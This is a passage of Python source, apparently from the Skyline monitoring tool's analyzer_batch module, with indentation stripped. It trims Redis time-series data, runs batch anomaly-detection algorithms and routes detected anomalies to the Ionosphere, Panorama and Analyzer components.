# allow the Redis key to have data at a different resolution than
# FULL_DURATION, which allows for feeding a metric at 1 data point
# per 10 mins (a la fake Mirage)
try:
if ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS:
for metric_namespace, custom_full_duration in ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS:
if metric_namespace in base_name:
duration = custom_full_duration + settings.ROOMBA_GRACE_TIME
logger.info('batch_processing :: %s found in ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS, duration for roomba set to %s' % (
base_name, str(duration)))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to determine a custom roomba duration for %s from ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS' % base_name)
namespace_unique_metrics = '%sunique_metrics' % str(settings.FULL_NAMESPACE)
euthanized = 0
trimmed_keys = 0
active_keys = 0
try:
# Put pipe back in multi mode
pipe = self.redis_conn.pipeline()
# WATCH the key
pipe.watch(key)
pipe.multi()
# There's one value. Purge if it's too old
last_timestamp = int(timeseries[-1][0])
# Do not purge if it has not been analyzed
if (last_timestamp - duration) > last_analyzed_timestamp:
logger.info('batch_processing :: last_timestamp is %s, but for roomba setting to the last_analyzed_timestamp (%s) as it has not been analyzed' % (
str(last_timestamp), str(last_analyzed_timestamp)))
last_timestamp = last_analyzed_timestamp
now = int(last_analyzed_timestamp)
logger.info('batch_processing :: doing roomba on %s with %s data points' % (key, str(len(timeseries))))
roombaed = True
try:
if python_version == 2:
if not isinstance(timeseries[0], TupleType):
if timeseries[0] < last_timestamp - duration:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
pipe.execute()
euthanized += 1
timeseries = []
if python_version == 3:
if not isinstance(timeseries[0], tuple):
if timeseries[0] < now - duration:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
pipe.execute()
euthanized += 1
timeseries = []
except IndexError:
timeseries = []
# Check if the last value is too old and purge (guard against an empty
# timeseries if the key was already euthanized above)
if timeseries and timeseries[-1][0] < now - duration:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
pipe.execute()
euthanized += 1
timeseries = []
# Remove old datapoints and duplicates from timeseries
temp = set()
temp_add = temp.add
delta = now - duration
trimmed = [
tuple for tuple in timeseries
if tuple[0] > delta and
tuple[0] not in temp and not
temp_add(tuple[0])
]
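# temp_add() always returns None, so 'not temp_add(tuple[0])' is always
# True; the temp set therefore deduplicates the series by timestamp while
# the tuple[0] > delta test drops datapoints older than now - duration.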
# Purge if everything was deleted, set key otherwise
if len(trimmed) > 0:
# Serialize and turn key back into not-an-array
btrimmed = packb(trimmed)
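# The msgpack array header is stripped so that the remaining bytes can be
# appended to the Redis key and later fed back through Unpacker as a
# stream: a fixarray header (up to 15 elements) is 1 byte, an array 16
# header (up to 65535 elements) is 3 bytes and an array 32 header is
# 5 bytes.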
if len(trimmed) <= 15:
value = btrimmed[1:]
elif len(trimmed) <= 65535:
value = btrimmed[3:]
trimmed_keys += 1
else:
value = btrimmed[5:]
trimmed_keys += 1
pipe.set(key, value)
active_keys += 1
else:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
euthanized += 1
pipe.execute()
except WatchError:
logger.info('batch_processing :: blocked from euthanizing %s' % (key))
except Exception as e:
# If something bad happens, zap the key and hope it goes away
# pipe.delete(key)
# pipe.srem(namespace_unique_metrics, key)
# pipe.execute()
# euthanized += 1
logger.info(e)
logger.info('batch_processing :: something bad happened but not euthanizing %s' % (key))
finally:
pipe.reset()
raw_series = None
try:
raw_series = self.redis_conn.get(metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get %s from Redis' % metric_name)
raw_series = None
if not raw_series:
logger.info('No raw_series defined after euthanizing %s, returning' % (key))
# Remove from work list
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
if batch_mode:
continue
else:
return
try:
unpacker = Unpacker(use_list=False)
unpacker.feed(raw_series)
timeseries = list(unpacker)
if roombaed:
logger.info('batch_processing :: after roomba %s has %s data points' % (key, str(len(timeseries))))
except:
timeseries = []
# @added 20200506 - Feature #3532: Sort all time series
# To ensure that there are no unordered timestamps in the time
# series which are artefacts of the collector or carbon-relay, sort
# all time series by timestamp before analysis.
original_timeseries = timeseries
if original_timeseries:
timeseries = sort_timeseries(original_timeseries)
del original_timeseries
try:
del raw_series
except:
pass
timestamps_to_analyse = []
# Reverse the time series so that only the most recent (last) items need
# to be iterated, and break after the necessary iterations so the entire
# time series is not iterated over.
reversed_timeseries = list(reversed(timeseries))
for timestamp, value in reversed_timeseries:
if int(timestamp) > last_analyzed_timestamp:
timestamps_to_analyse.append(int(timestamp))
else:
break
del reversed_timeseries
timestamps_to_analyse = list(reversed(timestamps_to_analyse))
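# Reversed back so the timestamps to analyse are in ascending (oldest
# first) order.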
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Handle there being no timestamps_to_analyse and report it, as
# otherwise the only info logged is that the work key just gets removed
# 2020-04-14 12:57:25 :: 3222 :: there are 1 metrics to process in the analyzer.batch Redis set
# 2020-04-14 12:57:25 :: 3222 :: processing - ['vista.demo_robustperception_io.prometheus.node_disk_read_time_seconds_total', 1586868000]
# 2020-04-14 12:57:25 :: 3222 :: starting 1 of 1 spin_batch_process
# 2020-04-14 12:57:25 :: 7852 :: batch :: child_batch_process_pid - 7852, processing vista.demo_robustperception_io.prometheus.node_disk_read_time_seconds_total from 1586868000
# 2020-04-14 12:57:25 :: 7852 :: analyzer_batch :: removed work item - ['vista.demo_robustperception_io.prometheus.node_disk_read_time_seconds_total', 1586868000] - from Redis set - analyzer.batch
# 2020-04-14 12:57:25 :: 7852 :: spin_batch_process took 0.04 seconds
# 2020-04-14 12:57:25 :: 3222 :: 1 spin_batch_process completed in 0.10 seconds
# 2020-04-14 12:57:25 :: 3222 :: exceptions - Stale: 9, Boring: 6, TooShort: 0, Other: 0
# 2020-04-14 12:57:25 :: 3222 :: anomaly_breakdown - histogram_bins: 0, first_hour_average: 0, stddev_from_average: 0, grubbs: 0, ks_test: 0, mean_subtraction_cumulation: 0, median_absolute_deviation: 0, stddev_from_moving_average: 0, least_squares: 0
number_of_timestamps_to_analyze = len(timestamps_to_analyse)
if number_of_timestamps_to_analyze == 0:
logger.info('no timestamps were found to analyze for %s from %s, nothing to do' % (
metric_name, str(last_analyzed_timestamp)))
# @added 20200424 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Feature #3504: Handle airgaps in batch metrics
# If there are no data points to analyze remove from the set
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
# Clean up and return
try:
del timeseries
except:
pass
try:
del timestamps_to_analyse
except:
pass
try:
del batch_timeseries
except:
pass
if batch_mode:
continue
else:
try:
del mirage_unique_metrics
except:
pass
try:
del ionosphere_unique_metrics
except:
pass
try:
del derivative_metrics
except:
pass
try:
del non_derivative_metrics
except:
pass
try:
del non_derivative_monotonic_metrics
except:
pass
try:
del non_smtp_alerter_metrics
except:
pass
return
else:
last_redis_data_timestamp = timestamps_to_analyse[-1]
logger.info('%s timestamps were found to analyze for %s from %s to %s' % (
str(number_of_timestamps_to_analyze), metric_name,
str(last_analyzed_timestamp), str(last_redis_data_timestamp)))
# @modified 20200728 - Bug #3652: Handle multiple metrics in base_name conversion
# base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
if metric_name.startswith(settings.FULL_NAMESPACE):
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric_name
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrics have negative values so they can be
# added to the ionosphere_untrainable_metrics Redis set
run_negatives_present = False
if settings.IONOSPHERE_ENABLED:
run_negatives_present = True
try:
known_negative_metric_matched_by = None
known_negative_metric, known_negative_metric_matched_by = matched_or_regexed_in_list(skyline_app, base_name, KNOWN_NEGATIVE_METRICS)
if known_negative_metric:
run_negatives_present = False
except:
run_negatives_present = True
# @added 20170602 - Feature #2034: analyse_derivatives
# In order to convert monotonic, incrementing metrics to a derivative
# metric
known_derivative_metric = False
unknown_deriv_status = True
# @modified 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# Switch the order in which they are checked and do not check if
# not manage_derivative_metrics as will only be set to True anyway
# if metric_name in non_derivative_metrics:
# unknown_deriv_status = False
# if unknown_deriv_status:
# if metric_name in derivative_metrics:
# known_derivative_metric = True
# unknown_deriv_status = False
if metric_name in derivative_metrics:
known_derivative_metric = True
unknown_deriv_status = False
if unknown_deriv_status:
if metric_name in non_derivative_metrics:
unknown_deriv_status = False
# First check if it has its own Redis z.derivative_metric key
# that has not expired
derivative_metric_key = 'z.derivative_metric.%s' % str(base_name)
# @added 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# When a metric's monotonicity changes in the last run before a
# manage_derivative_metrics run, manage_derivative_metrics
# classifies it and adds it to non_derivative_metrics; the only
# way to stop this is to check the key for each metric
last_derivative_metric_key = None
try:
last_derivative_metric_key = self.redis_conn_decoded.get(derivative_metric_key)
except Exception as e:
logger.error('error :: could not query Redis for last_derivative_metric_key: %s' % e)
if last_derivative_metric_key:
known_derivative_metric = True
if unknown_deriv_status:
# @added 20170617 - Bug #2050: analyse_derivatives - change in monotonicity
# @modified 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# Always check moved to above
# last_derivative_metric_key = False
# try:
# last_derivative_metric_key = self.redis_conn.get(derivative_metric_key)
# except Exception as e:
# logger.error('error :: could not query Redis for last_derivative_metric_key: %s' % e)
# @modified 20200601 - Feature #3480: batch_processing
# Bug #2050: analyse_derivatives - change in monotonicity
# Apply skip_derivative
skip_derivative = in_list(base_name, non_derivative_monotonic_metrics)
is_strictly_increasing_monotonically = False
if not skip_derivative:
is_strictly_increasing_monotonically = strictly_increasing_monotonicity(timeseries)
if is_strictly_increasing_monotonically:
try:
last_expire_set = int(time())
self.redis_conn.setex(
derivative_metric_key, settings.FULL_DURATION, last_expire_set)
except Exception as e:
logger.error('error :: could not set Redis derivative_metric key: %s' % e)
else:
is_strictly_increasing_monotonically = False
# Determine if it is a strictly increasing monotonically metric
# or has been in last FULL_DURATION via its z.derivative_metric
# key
if last_derivative_metric_key:
# Until the z.derivative_metric key expires, it is classed
# as such
is_strictly_increasing_monotonically = True
if skip_derivative:
is_strictly_increasing_monotonically = False
if is_strictly_increasing_monotonically:
known_derivative_metric = True
try:
self.redis_conn.sadd('derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis derivative_metrics set')
try:
self.redis_conn.sadd('new_derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis new_derivative_metrics set')
try:
last_expire_set = int(time())
self.redis_conn.setex(
derivative_metric_key, settings.FULL_DURATION, last_expire_set)
except Exception as e:
logger.error('error :: could not set Redis derivative_metric key: %s' % e)
else:
try:
self.redis_conn.sadd('non_derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis non_derivative_metrics set')
try:
self.redis_conn.sadd('new_non_derivative_metrics', metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add metric to Redis new_non_derivative_metrics set')
not_anomalous_count = 0
# @added 20200815 - Feature #3678: SNAB - anomalyScore
record_anomalyScore = False
if SNAB_anomalyScore:
SNAB_metrics = []
try:
SNAB_all_metrics = SNAB_anomalyScore['all']
if SNAB_all_metrics:
for SNAB_metric in SNAB_all_metrics:
SNAB_metrics.append(SNAB_metric)
except:
SNAB_all_metrics = []
try:
SNAB_app_metrics = SNAB_anomalyScore[skyline_app]
if SNAB_app_metrics:
for SNAB_metric in SNAB_app_metrics:
SNAB_metrics.append(SNAB_metric)
except:
SNAB_app_metrics = []
if SNAB_metrics:
for SNAB_metric_namespace in list(set(SNAB_metrics)):
if SNAB_metric_namespace in base_name:
record_anomalyScore = True
break
test_anomaly = False
test_anomaly_at = None
try:
test_anomaly_key = 'analyzer_batch.test.%s' % base_name
try:
test_anomaly = self.redis_conn.get(test_anomaly_key)
test_anomaly_at = int(test_anomaly)
logger.info('test_anomaly - testing anomaly on %s at %s' % (metric_name, str(test_anomaly_at)))
except:
test_anomaly = None
except:
test_anomaly = False
# Distill timeseries strings into lists
for i, batch_timestamp in enumerate(timestamps_to_analyse):
self.check_if_parent_is_alive()
batch_timeseries = []
for timestamp, value in timeseries:
if int(timestamp) <= batch_timestamp:
batch_timeseries.append([timestamp, value])
if known_derivative_metric:
try:
derivative_timeseries = nonNegativeDerivative(batch_timeseries)
batch_timeseries = derivative_timeseries
except:
logger.error('error :: nonNegativeDerivative failed')
try:
# Allow for testing. To test a metric, stop the metric sending
# data to carbon-relay (use a vista metric).
# Determine a timestamp that will fall into the stopped period.
# Add the timestamp to a Redis key called
# analyzer_batch.test.<metric_name>
# Start the metric sending data again (re-enable in vista).
# vista/flux will fill the missing data. When analyzer pushes
# the metric to analyzer_batch to process, if analyzer_batch
# is set to test_anomaly True and finds the key, and the
# timestamp matches the timestamp in the key, analyzer_batch
# will multiply that data point by 100, which should
# trigger an anomaly. Ensure you use a metric which will
# trigger; a load related metric is usually adequate.
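# For example, with a hypothetical metric name and timestamp (both
# illustrative only), the key could be set with something like:
#   redis-cli SET analyzer_batch.test.vista.demo.some.metric 1586868000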
# test_anomaly = False
test_anomaly_at = None
test_anomaly_batch_timeseries = []
if test_anomaly:
test_anomaly_at = None
test_anomaly_key = 'analyzer_batch.test.%s' % base_name
try:
test_anomaly_at = self.redis_conn.get(test_anomaly_key)
except:
test_anomaly_at = None
if test_anomaly_at:
if int(test_anomaly_at) == int(batch_timeseries[-1][0]):
for timestamp, value in batch_timeseries:
if int(timestamp) == int(test_anomaly_at):
anomaly_value = value * 100
logger.info('test_anomaly - replacing value %s with anomaly_value of %s at %s in %s timeseries' % (
str(value), str(anomaly_value),
str(test_anomaly_at), metric_name))
value = anomaly_value
test_anomaly_batch_timeseries.append([timestamp, value])
if test_anomaly_batch_timeseries:
batch_timeseries = test_anomaly_batch_timeseries
logger.info('test_anomaly - replaced %s timeseries with anomaly value in it' % (
metric_name))
try:
self.redis_conn.delete(test_anomaly_key)
logger.info('test_anomaly - deleted test_anomaly Redis key - %s' % str(test_anomaly_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete test_anomaly Redis key - %s' % str(test_anomaly_key))
# @modified 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Changed to algorithms_batch so there is no pollution and
# analyzer and analyzer_batch are totally independent
# metric_airgaps = []
# anomalous, ensemble, datapoint = run_selected_algorithm(batch_timeseries, metric_name, metric_airgaps)
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added run_negatives_present and added negatives_found
# anomalous, ensemble, datapoint = run_selected_batch_algorithm(batch_timeseries, metric_name)
# @modified 20200607 - Feature #3566: custom_algorithms
# Added algorithms_run
# @modified 20200815 - Feature #3678: SNAB - anomalyScore
# Added the number_of_algorithms to calculate anomalyScore from
anomalous, ensemble, datapoint, negatives_found, algorithms_run, number_of_algorithms = run_selected_batch_algorithm(batch_timeseries, metric_name, run_negatives_present)
if test_anomaly_batch_timeseries:
logger.info('test_anomaly - analyzed %s data with anomaly value in it and anomalous = %s' % (
metric_name, str(anomalous)))
# @added 20200815 - Feature #3678: SNAB - anomalyScore
if record_anomalyScore:
anomalyScore_file = '%s/%s/%s/skyline.SNAB.%s.anomalyScore.csv' % (
SNAB_DATA_DIR, skyline_app, base_name, base_name)
# Get the anomaly breakdown - who returned True?
triggered_algorithms = []
run_debug = False
if ensemble.count(True) and algorithms_run:
run_debug = True
if (int(batch_timestamp) % 20000) == 0:
run_debug = True
if run_debug:
logger.debug('debug :: ensemble to calculate anomalyScore - %s' % str(ensemble))
logger.debug('debug :: algorithms_run to calculate anomalyScore - %s' % str(algorithms_run))
for index, value in enumerate(ensemble):
if value:
algorithm = algorithms_run[index]
triggered_algorithms.append(algorithm)
if run_debug:
logger.debug('debug :: triggered_algorithms to calculate anomalyScore - %s' % str(triggered_algorithms))
anomalyScore = 0.0
try:
if len(triggered_algorithms) > 0 and number_of_algorithms > 0:
if len(triggered_algorithms) > settings.CONSENSUS:
anomalyScore = 1.0
else:
anomalyScore = len(triggered_algorithms) / settings.CONSENSUS
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate anomalyScore')
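# For example (illustrative values): with settings.CONSENSUS = 6, three
# triggered algorithms give an anomalyScore of 3 / 6 = 0.5, while more
# than six triggered algorithms cap the score at 1.0.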
if not os.path.isfile(anomalyScore_file):
data = 'timestamp,value,anomalyScore,triggered_algorithms\n'
write_data_to_file(skyline_app, anomalyScore_file, 'w', data)
data = '%s,%s,%s,%s\n' % (str(int(batch_timestamp)), str(datapoint), str(anomalyScore), str(triggered_algorithms))
write_data_to_file(skyline_app, anomalyScore_file, 'a', data)
if run_debug:
logger.debug('%s,%s,%s,%s' % (str(int(batch_timestamp)), str(datapoint), str(anomalyScore), str(triggered_algorithms)))
# Update the last_timestamp metric Redis key
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
redis_key_set = None
try:
int_metric_timestamp = int(batch_timestamp)
# @modified 20200503 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Set the last_timestamp expiry time to 1 month rather than
# settings.FULL_DURATION
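# (2592000 seconds = 30 days)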
self.redis_conn.setex(
last_metric_timestamp_key, 2592000, int_metric_timestamp)
redis_key_set = True
except:
logger.error('error :: failed to set Redis key %s' % last_metric_timestamp_key)
if anomalous:
if redis_key_set:
logger.info('anomalous :: anomaly detected on %s at %s with %s, set Redis key %s to %s' % (
base_name, str(int_metric_timestamp), str(datapoint),
last_metric_timestamp_key, str(int_metric_timestamp)))
else:
logger.info('anomalous :: anomaly detected on %s at %s with %s' % (
base_name, str(int_metric_timestamp),
str(datapoint)))
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrics have negative values so they can be
# added to the ionosphere.untrainable_metrics Redis set
if run_negatives_present and negatives_found:
redis_set = 'ionosphere.untrainable_metrics'
try:
last_negative_timestamp = int(negatives_found[-1][0])
last_negative_value = negatives_found[-1][1]
remove_after_timestamp = int(last_negative_timestamp + settings.FULL_DURATION)
data = str([metric_name, batch_timestamp, datapoint, last_negative_timestamp, last_negative_value, settings.FULL_DURATION, remove_after_timestamp])
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add data to Redis set %s' % (
str(redis_set)))
# Added a Redis key for Mirage, Panorama and Ionosphere to
# query to identify if an anomaly has been added by
# analyzer_batch and set a longish TTL as if multiple
# anomalies for multiple metrics in a batch are sent to
# Ionosphere it could take Ionosphere a while to analyze
# them all. This key circumvents the requirement of each
# app to determine if a metric is a batch metric, as this
# is only created for batch metric anomalies.
analyzer_batch_metric_anomaly_key = '%s.anomaly.%s.%s' % (
skyline_app, str(int_metric_timestamp), base_name)
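# e.g. (hypothetical values)
# analyzer_batch.anomaly.1586868000.vista.demo.some.metric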
try:
int_metric_timestamp = int(batch_timestamp)
self.redis_conn.setex(
analyzer_batch_metric_anomaly_key,
3600, int_metric_timestamp)
logger.info('set Redis key %s with %s for other apps to identify this as an analyzer_batch anomaly' % (
analyzer_batch_metric_anomaly_key,
str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s' % analyzer_batch_metric_anomaly_key)
else:
if redis_key_set:
not_anomalous_count += 1
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('not anomalous :: %s at %s with %s (along with %s other not anomalous data points), set Redis key %s to %s' % (
base_name, str(int_metric_timestamp), str(datapoint),
str(not_anomalous_count),
last_metric_timestamp_key, str(int_metric_timestamp)))
else:
logger.info('not anomalous :: %s at %s with %s' % (
base_name, str(int_metric_timestamp),
str(datapoint)))
# @added 20190408 - Feature #2882: Mirage - periodic_check
# Add for Mirage periodic - is really anomalous add to
# real_anomalous_metrics and if in mirage_periodic_check_metric_list
# add as anomalous
if anomalous:
metric_timestamp = batch_timeseries[-1][0]
metric = [datapoint, base_name, metric_timestamp]
# Get the anomaly breakdown - who returned True?
triggered_algorithms = []
for index, value in enumerate(ensemble):
if value:
# @modified 20200607 - Feature #3566: custom_algorithms
# algorithm = settings.ALGORITHMS[index]
algorithm = algorithms_run[index]
anomaly_breakdown[algorithm] += 1
triggered_algorithms.append(algorithm)
# @added 20170206 - Bug #1904: Handle non filesystem friendly metric names in check files
sane_metricname = filesafe_metricname(str(base_name))
# If Panorama is enabled determine details
determine_anomaly_details = False
if settings.PANORAMA_ENABLED:
determine_anomaly_details = True
# If Ionosphere is enabled determine details
try:
ionosphere_enabled = settings.IONOSPHERE_ENABLED
if settings.IONOSPHERE_ENABLED:
determine_anomaly_details = True
except:
ionosphere_enabled = False
if determine_anomaly_details:
metric_timestamp = str(int(batch_timeseries[-1][0]))
from_timestamp = str(int(batch_timeseries[1][0]))
timeseries_dir = base_name.replace('.', '/')
send_back_to_analyzer = None
# @added 20161119 - Branch #922: ionosphere
# Task #1718: review.tsfresh
# Set defaults which can be used later to determine how
# Analyzer should handle/route anomalies
analyzer_metric = True
mirage_metric = False
ionosphere_metric = False
send_to_ionosphere = False
if metric_name in ionosphere_unique_metrics:
ionosphere_metric = True
send_to_ionosphere = True
if metric_name in mirage_unique_metrics:
analyzer_metric = False
ionosphere_metric = False
mirage_metric = True
send_to_ionosphere = False
# @added 20170108 - Feature #1830: Ionosphere alerts
# Only send smtp_alerter_metrics to Ionosphere
smtp_alert_enabled_metric = True
if base_name in non_smtp_alerter_metrics:
smtp_alert_enabled_metric = False
if ionosphere_enabled:
if analyzer_metric:
# We do not want to send all anomalous metrics to
# Ionosphere if they are not being alerted on, as
# that would be pointless: there will be no alert if
# it is within the EXPIRATION_TIME and there will be
# no reference graphs from an alert for the user to
# action.
cache_key = 'last_alert.smtp.%s' % (base_name)
last_alert = False
try:
last_alert = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not last_alert:
send_to_ionosphere = True
else:
send_to_ionosphere = False
if ionosphere_metric:
logger.info('not sending to Ionosphere - alert key exists - %s' % (base_name))
else:
if mirage_metric:
logger.info('not sending to Ionosphere - Mirage metric - %s' % (base_name))
send_to_ionosphere = False
# analyzer_batch sends Analyzer and Mirage
# metrics back to analyzer
send_back_to_analyzer = True
# @added 20170306 - Feature #1960: ionosphere_layers
# Ionosphere layers require the timeseries at
# FULL_DURATION, so if this is a Mirage and
# Ionosphere metric, Analyzer needs to provide
# the timeseries file for later (within 60
# seconds) analysis, and we want the data
# that triggered the anomaly. Previously this file
# was only created by Mirage if an alert was
# triggered, but Ionosphere layers now require
# this file before an alert is triggered.
timeseries_dir = base_name.replace('.', '/')
training_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, str(metric_timestamp),
str(timeseries_dir))
if not os.path.exists(training_dir):
mkdir_p(training_dir)
full_duration_in_hours = int(settings.FULL_DURATION) / 3600
ionosphere_json_file = '%s/%s.mirage.redis.%sh.json' % (
training_dir, base_name,
str(int(full_duration_in_hours)))
if not os.path.isfile(ionosphere_json_file):
timeseries_json = str(batch_timeseries).replace('[', '(').replace(']', ')')
try:
write_data_to_file(skyline_app, ionosphere_json_file, 'w', timeseries_json)
logger.info('%s added Ionosphere Mirage %sh Redis data timeseries json file :: %s' % (
skyline_app, str(int(full_duration_in_hours)), ionosphere_json_file))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s Ionosphere Mirage Redis data timeseries json file - %s' % (skyline_app, ionosphere_json_file))
# @modified 20170108 - Feature #1830: Ionosphere alerts
# Only send smtp_alerter_metrics to Ionosphere
# if send_to_ionosphere:
if send_to_ionosphere and smtp_alert_enabled_metric:
if metric_name in ionosphere_unique_metrics:
logger.info('sending an ionosphere metric to Ionosphere - %s' % (base_name))
else:
logger.info('sending an analyzer metric to Ionosphere for training - %s' % (base_name))
try:
# @modified 20161228 Feature #1828: ionosphere - mirage Redis data features
# Added full_duration
# @modified 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
ionosphere_parent_id = 0
send_anomalous_metric_to(
skyline_app, 'ionosphere', timeseries_dir,
metric_timestamp, base_name, str(datapoint),
from_timestamp, triggered_algorithms,
batch_timeseries, str(settings.FULL_DURATION),
str(ionosphere_parent_id))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved to Redis key block below
# self.sent_to_ionosphere.append(base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to send_anomalous_metric_to to ionosphere')
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
redis_set = 'analyzer.batch.sent_to_ionosphere'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20170403 - Feature #1994: Ionosphere training_dir keys
# Feature #2000: Ionosphere - validated
# Feature #1996: Ionosphere - matches page
# The addition of this key data could be done in
# skyline_functions.py, however that would introduce
# Redis requirements in the send_anomalous_metric_to
# function, which is not desirable I think. So this is
# a non-KISS pattern that is replicated in mirage.py as
# well.
# Each training_dir and data set is now Redis keyed to increase efficiency
# in terms of disk I/O for ionosphere.py and making keyed data
# available for each training_dir data set so that transient matched data
# can be surfaced for the webapp along with directory paths, etc
ionosphere_training_data_key = 'ionosphere.training_data.%s.%s' % (str(metric_timestamp), base_name)
ionosphere_training_data_key_data = [
['metric_timestamp', int(metric_timestamp)],
['base_name', str(base_name)],
['timeseries_dir', str(timeseries_dir)],
['added_by', str(skyline_app)]
]
try:
self.redis_conn.setex(
ionosphere_training_data_key,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR,
# @modified 20190413 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# redis-py 3.x only accepts user data as bytes, strings or
# numbers (ints, longs and floats). All 2.X users should
# make sure that the keys and values they pass into redis-py
# are either bytes, strings or numbers. Use str
str(ionosphere_training_data_key_data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to set Redis key %s' % ionosphere_training_data_key)
try:
del ionosphere_training_data_key_data
except:
pass
if ionosphere_metric:
analyzer_metric = False
# Only send Analyzer metrics
if analyzer_metric and settings.PANORAMA_ENABLED:
if not os.path.exists(settings.PANORAMA_CHECK_PATH):
mkdir_p(settings.PANORAMA_CHECK_PATH)
# Note:
# The values are enclosed in single quotes intentionally
# as the imp.load_source used results in a shift in the
# decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
added_at = str(int(time()))
source = 'graphite'
panorama_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'app = \'%s\'\n' \
'source = \'%s\'\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(datapoint), from_timestamp,
# @modified 20200603 - Feature #3566: custom_algorithms
# metric_timestamp, str(settings.ALGORITHMS),
metric_timestamp, str(algorithms_run),
triggered_algorithms, skyline_app, source,
this_host, added_at)
# Create an anomaly file with details about the anomaly
panorama_anomaly_file = '%s/%s.%s.txt' % (
settings.PANORAMA_CHECK_PATH, added_at,
sane_metricname)
try:
write_data_to_file(
skyline_app, panorama_anomaly_file, 'w',
panorama_anomaly_data)
logger.info('added panorama anomaly file :: %s' % (panorama_anomaly_file))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved to Redis set block below
# self.sent_to_panorama.append(base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add panorama anomaly file :: %s' % (panorama_anomaly_file))
try:
del panorama_anomaly_data
except:
pass
redis_set = 'analyzer_batch.sent_to_panorama'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
else:
# @modified 20160207 - Branch #922: Ionosphere
# Handle if all other apps are not enabled
other_app = 'none'
if mirage_metric:
other_app = 'Mirage'
if ionosphere_metric:
other_app = 'Ionosphere'
logger.info('not adding panorama anomaly file for %s - %s' % (other_app, metric))
# Send back to Analyzer to alert
if analyzer_metric:
send_back_to_analyzer = True
if send_back_to_analyzer:
cache_key = '%s.alert.%s.%s' % (skyline_app, metric_timestamp, base_name)
# @modified 20201008 - Feature #3772: Add the anomaly_id to the http_alerter json
# Branch #3068: SNAB
# Added algorithms_run
cache_key_value = [float(datapoint), base_name, int(metric_timestamp), triggered_algorithms, algorithms_run]
try:
self.redis_conn.setex(
cache_key, 300,
str(cache_key_value))
logger.info(
'add Redis alert key - %s - %s' %
